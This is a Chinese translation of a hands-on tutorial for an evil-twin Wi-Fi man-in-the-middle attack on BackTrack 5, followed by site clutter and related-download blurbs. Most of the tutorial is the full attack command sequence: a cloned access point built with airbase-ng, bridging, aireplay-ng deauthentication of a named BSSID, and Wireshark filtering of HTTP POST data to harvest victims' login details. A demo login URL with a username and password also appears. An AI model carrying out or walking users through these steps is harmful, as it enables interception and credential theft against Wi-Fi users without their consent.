前言:先说明一下,这个文章不是我写的,是一个老外(Deepanshu Kapoor)安全专家写的,我一开始就是看着玩,但整个看完被老外那个细心和耐心给打动了,整个过程其实很简单,但是老外分了好多步骤来讲解,每个步骤都有配图和说明,甚至命令的参数都要解释一下。不得不佩服老外分享和奉献的精神,所以我也学着奉献一下,把它翻译成中文给大家看看吧,我尽量保持原汁原味,有不恰当的地方要原谅我,毕竟我不是专业翻译。(对原文PDF文档感兴趣的留邮箱,我发给你)
BT5 + wireshark玩wifi数据包捕获和session注入(中间人攻击)
介绍:
主要思路是通过伪造相同名称的wifi接入点,配合发送ARP数据包,攻击连入伪造wifi的用户。一个与原有wifi相同名称的伪造接入点一旦建立,会导致用户从原有链接中断开,并连入你所建立的伪造接入点中,因此所有的通信通道都会流经我的系统,届时我们通常会用session注入的方式拿到用户所有的细节/授信状态/信息等。
必备神器:
1,BT5(Backtrack操作系统)
2,虚拟机(带USB设备)
3,可联网的主机
第一步:
开BT5的terminal终端,然后输入”iwconfig” 检查无线网卡。
说明:iwconfig类似于ifconfig,但是是用于无线网络的。它经常被用来设置无线网卡的参数。
第二步:
输入“airmon-ng start wlan0”开启无线网卡。
说明:这个命令可以被用来让无线网卡处于监听状态。也可以被用来从监听模式中恢复成管理模式。输入 “airmon-ng”不带参数,可以显示网卡状态。
wlan0 是指wifi网卡。
wlan 是无线局域网, 0 是你的网卡编号。
第三步:
在网卡已经启动了监听模式后,输入“airodump-ng mon0”就可以开始抓包了。
说明:airodump-ng 可以用来抓802.11的原始帧数据包,特别适合于收集WEP的初始化向量用于aircrack-ng的破解。Airodump-ng也能够用来记录找到的接入点的坐标。
mon0在监听模式下和wlan0的意思是一样的。
一旦你把wlan0设置为监听模式,wlan0就要改为mon0。
第四步:
设置在airodump-ng中显示的频道ID,命令如下:
“iwconfig mon0 channel 5” “iwconfig wlan0 channel 5”
或者
“iwconfig wlan0 channel 5” “iwconfig mon0 channel 5”
说明:参数“channel”用来选定一个单独的特殊频道。
第五步:
现在开始建立你的伪造路由器,命令如下:
“airbase-ng - e “belkin.3448” mon0”
说明:airbase-ng是个多用途的工具,可针对AP(接入点)自身的客户端进行攻击,主要的思路是驱使客户端去连接伪造的AP,不是阻止客户端去连接真实AP。
“-e + SSID”指定伪造AP的SSID名称。
第六步:
现在是时候去“桥接”所有的网络了,命令如下:
“brctl addbr mitm”
“brctl addif mitm eth0”
“brctl addif mitm at0”
中间人就是<interface name> 。(这句话看原文直接翻译有些难以理解,实际上作者就是想说at0这个网卡架起来的网桥就是个中间人,攻击就是在这里完成的。—–译者注)
说明:
Brctl 用来在两个网卡之间建立桥接网络。
Addbr 用来添加网桥的对象,用<name>来指定网桥的名称。
Addif 给已经使用addbr创建的网桥中添加一个网卡,后边的参数使用你要添加的网卡名称即可。
第七步:
现在创建一个新的网卡配置,命令如下:
“ifconfig eth0 0.0.0.0 up”
“ifconfig at0 0.0.0.0 up”
说明:ifconfig 不用多说了,用来配置网卡,大家经常用的。
第八步:
现在可以启动我们用来做中间人攻击的网桥了!命令如下:
“ifconfig mitm up”
说明:配置完成的网桥可以使用ifconfig来启用。
第九步:
现在使用下面的命令发送认证包到路由器上,
“aireplay-ng - - deauth 0 - a 94:44:52:DA:B4:28 mon0”
说明:aireplay-ng 用来注入帧数据。
-a 指定被攻击者的BSSID。
94:44:52:DA:B4:28这个是被攻击者的BSSID。
第十步:
现在开始给被攻击者分配IP,命令如下:
“dhclient3 mitm&” 或者 “dhclient3 mitm &”
说明:
使用类似DHCP的协议方式分配IP。
第十一步:
现在你可以看看是不是有客户端已经连接上了,有的话会显示在第五步的那个命令终端里面。
第十二步:
开wireshark,命令:“wireshark&”
说明:wireshark是个网络协议抓包分析器。
第十三步:
选择网卡,点开始(start)
第十四步:
输入 “http contains POST”过滤一下,然后你就可以看到所有抓下来的数据包了。
http://exploit.deepanshukapoor.org/admin.php
Username – john
Password – 1234
- 大小: 159.2 KB
- 大小: 182.8 KB
- 大小: 98.8 KB
- 大小: 42.5 KB
- 大小: 78.4 KB
- 大小: 55.8 KB
- 大小: 71.2 KB
- 大小: 34.4 KB
- 大小: 217.2 KB
- 大小: 152.1 KB
- 大小: 113.2 KB
- 大小: 118.2 KB
- 大小: 151.5 KB
- 大小: 295.6 KB
- 大小: 162.7 KB
分享到:
相关推荐
标题中的"ensp+wireshark+VirtualBox+winPacp"暗示了这是一个关于网络技术的实践教程,其中涉及到了几个关键工具:eNSP(Enterprise Network Simulation Platform)、Wireshark、VirtualBox以及winPcap。让我们逐一...
5. **深入调查:** 如果发现潜在问题,可以使用Wireshark的解码和分析功能,查看具体的数据包内容,了解攻击或异常行为的细节。 6. **报告和响应:** 根据分析结果,生成报告,并采取相应的安全措施或网络调整。 在...
【ARP攻击】ARP攻击,即中间人攻击,利用了ARP协议的缺陷。ARP负责将IP地址转换为MAC地址,攻击者通过发送虚假的ARP响应,将目标主机的流量重定向到攻击者,从而实现数据拦截。在描述中,展示了如何在Kali Linux上...
本压缩包中包含了eNSP、VirtualBox、WinPcap、Wireshark、以及在安装过程中可能出现的问题的总结,如有其他问题,请私信我!
NPCap和Wireshark是网络分析和数据包捕获领域中的两个重要工具,它们在IT行业中广泛用于网络故障排查、安全审计以及协议分析。这里我们将深入探讨这两个工具及其结合使用的方式。 **NPCap(网络捕获)** NPCap是...
5. **Wireshark使用教程**:"compnetw_6":这个文件可能是关于如何使用Wireshark的详细教程,包含Wireshark的基本操作、过滤器语法、捕获和分析网络流量等内容。通过学习,学生能够运用Wireshark来监控网络活动,...
本文档主要介绍如何使用TI CC2530微控制器和Wireshark软件来抓取和解密Zigbee 3.0协议的数据包。Zigbee 3.0是一种低功耗、短距离无线通信标准,广泛应用于智能家居、物联网设备等场景。下面将详细讲解整个抓包过程。...
ensp+wireshark+virtualbox+winpcap eNSP(Enterprise Network Simulation Platform)是一款由华为提供的免费的、可扩展的、图形化的网络设备仿真平台。主要对企业网路由器、交换机、WLAN等设备进行软件仿真,完美呈现...
《Wireshark数据包分析实战(第2版)》一书深入浅出地介绍了如何利用Wireshark来捕获、解析和分析网络数据包。这本书的配套捕获文件包含了书中所有实例的原始数据包,使读者能够动手实践,加深对网络通信的理解。 1...
1. **启动Wireshark**:打开Wireshark应用程序,确保你已捕获到包含WPA-PWD加密的WiFi流量。这可能需要将Wireshark连接到一个可以监听该WiFi网络的接口。 2. **编辑首选项**:通过菜单栏选择“Edit” > ...
5. **Wireshark**: Wireshark 是一款强大的网络封包分析软件,它可以捕获并显示网络封包,帮助分析端口活动。在Windows平台上,有Wireshark_win32_版本,用户可以借此观察到所有进出数据包,包括端口的开放和关闭。 ...
【网络+wireshark,http,dns,tcp,dhcp,arp】...总的来说,这些实验项目旨在帮助学习者掌握网络基础协议的工作原理,通过Wireshark的实际操作提升分析和解决问题的能力,这对于网络管理和故障排查是极其宝贵的技能。
其次,Wireshark是全球最广泛使用的网络封包分析软件,其Version3.2.1版本提供了更高效的数据捕获和解析能力。它能实时监测网络通信,深度解析各种网络协议,帮助用户理解网络流量模式,查找并解决网络问题。在与GNS...
Wireshark是一个网络封包分析软件。网络封包分析软件的功能是撷取网络封包,并尽可能显示出最为详细的网络封包资料。本压缩包包括Wireshark从入门到精通PDF版和Wireshark_win32_2.2.1.0安装文件。
计算机通信网课程小组项目__园区网的规划+Wireshark抓包分析_Computer-Communication-Network-Course-Project
计算机网络练习 WireShark 捕获和分析数据包 Wireshark 是一款功能强大且流行的网络分析工具,可以捕捉网络中的数据,并为用户提供关于网络和上层协议的各种信息。Wireshark 使用 pcap network library 来进行封包...
本书《Wireshark数据包分析实战(第2版)》深入浅出地讲解了如何利用Wireshark来捕获、解析和理解网络数据包。通过对捕获文件的分析,我们可以深入了解网络通信的细节,提升网络问题诊断能力。 Wireshark的核心功能...
计算机网络练习之使用Wireshark捕获和分析数据包 本资源摘要信息是关于使用Wireshark捕获和分析数据包的计算机网络练习,主要涵盖以太帧格式、ARP协议格式和ARP协议的工作原理等知识点。 一、以太帧格式 * 以太帧...